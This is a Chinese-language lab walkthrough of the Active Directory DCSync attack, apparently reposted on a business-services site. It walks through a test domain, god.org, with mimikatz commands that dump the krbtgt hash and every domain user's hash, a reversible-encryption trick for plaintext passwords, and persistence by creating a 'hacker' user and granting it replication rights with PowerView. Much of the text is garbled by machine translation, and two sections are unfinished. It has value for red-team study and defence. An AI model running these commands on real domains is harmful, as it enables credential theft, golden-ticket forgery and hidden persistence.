域凭据获取——DCSync

攻击机kali IP：192.168.111.0
跳板机win7 IP：192.168.111.128，192.168.52.143
靶机win server 2008 IP：192.168.52.138
一、DCSync简介

在一个大型网络中往往存在多台域控制器（DC），每台DC都需要保持最新的凭据，而保持最新凭据的方法就是在各个域控制器之间举行数据共享，共享用户凭据、安全形貌符等域内变动信息。于是微软推出了目录复礼服务，这个服务让域控制器可以在其他域控制器举行任何修改时举行更新。例如，DC1新增了一个名为test的域用户，那么DC2就可以通过该服务的自身同步功能同时更新test用户。
DCSync就是伪装域控制器并利用DSGetNCChanges函数来哀求其他域控制器获取域内的用户凭据。DCSync攻击已经被集成到mimikatz中，在利用DCSync时mimikatz会自动模仿域控制器，并要求其他域控制器利用Microsoft目录复礼服务远程协议（MS-DRSR）来获取域内用户凭据，它可以通过这些手段要求其他域控制器将NTDS.DIT信息同步给自身模仿的域控制器。特殊注意：对于这些操纵，无需在域控制器上执行任何一条下令。
二、利用DCSync获取域内用户哈希

执行DCSync攻击的域用户必须具有复制目录更改所有项权限（Replicating Directory Changes All）和复制目录更改权限（Replicating Directory Changes），而在域内默认拥有有两种权限的用户如下：

• 域控制器本地管理员组
  
• 域管理员组
  
• 企业管理员组
  
• 域控制器盘算机账户
  

1、这里win 7作为域内主机，同时利用域内成员god\test登录win 7；该域成员并非域管理员，但在域内拥有“复制目录更改”和“复制目录更改所有项”权限。
在AD管理中心点击域的属性；

先添加当前域成员，在授权相应的权限。

2、利用该用户执行mimikatz的DCSync功能以获取指定域成员哈希。这里实验获取krbtgt用户的凭据，该用户是获取黄金票据是的紧张用户。下令如下：

1. # 获取域内krbtgt用户的哈希
2. mimikatz.exe "lsadump::dcsync /domain:god.org /user:krbtgt" exit

复制代码

3、获取域内所有用户的哈希

1. # 获取域内所有用户的哈希
2. mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

复制代码

三、DCSync可逆加密利用（没搞定）

当用户账号设置ReverseiblePasswordEncryption（可逆加密）属性后，攻击者可以直接获取该用户的明文暗码。前提是该域用户在设置可逆加密属性后修改过暗码

1. # 为test域用户设置可逆加密属性
2. Set-ADUser test -AllowReversiblePasswordEncryption $true

复制代码

  老是报错

  设置该属性后，利用mimikatz获取该域用户的明文暗码。

1. lsadump::dcsync /domain:god.org /user:test

复制代码

四、域外利用DCSync获取域用户哈希（待完成）

待完成。
五、利用ACL滥用举行DCSync持久化

如果想举行DCSync攻击，所用的账号需要有DS-Replication-Get-Changes、DS-Replication-Get-Changes-All这两个权限。DCSync攻击可用于持久化工作中。
下面的实验是在域控win server 2008上完成，假设已经拿到域管的账号暗码。下一步举行权限维持。
1、执行下面的下令新建一个域用户，并赋予“复制目录更改”和“复制目录更改所有项”两个权限。

1. # 域内新建用户
2. # net user <username> <password> /add /domain
3. net user hacker admin123. /add /domain
5. # 域内删除用户
6. # net user <username> /del /domain
7. net user hacker /del /domain

复制代码

1. import-module .\Powerview.ps1 # 导入Powerview.ps1
2. Add-DomainObjectAcl -TargetIdentity "DC=god,DC=org" -PrincipalIdentity hacker -Rights DCSync -Verbose
3. # DC=god,DC=org：代表god.org，即域名
4. # -PrincipalIdentity：指定所需添加到域的用户名
5. # -Rights：指定需要获取的权限
6. # -Verbose：显示详细运行信息

复制代码

2、利用god\hacker登录域内呆板，并举行DCSync攻击。

1. mimikatz.exe "lsadump::dcsync /domain:god.org /all /csv" exit

复制代码

3、如果想要查询域内哪些用户拥有“复制目录更改”和“复制目录更改所有项”两个权限。利用如下下令（下图实在域控上执行的，管理员打开powershell）：

1. # 获取拥有“复制目录更改”和“复制目录更改所有项”两个权限的用户
2. import-module .\Powerview.ps1 # 导入Powerview.ps1
3. Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.ObjectAceType -match "DS-Replication-Get-Changes"} # 需要域管账号

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。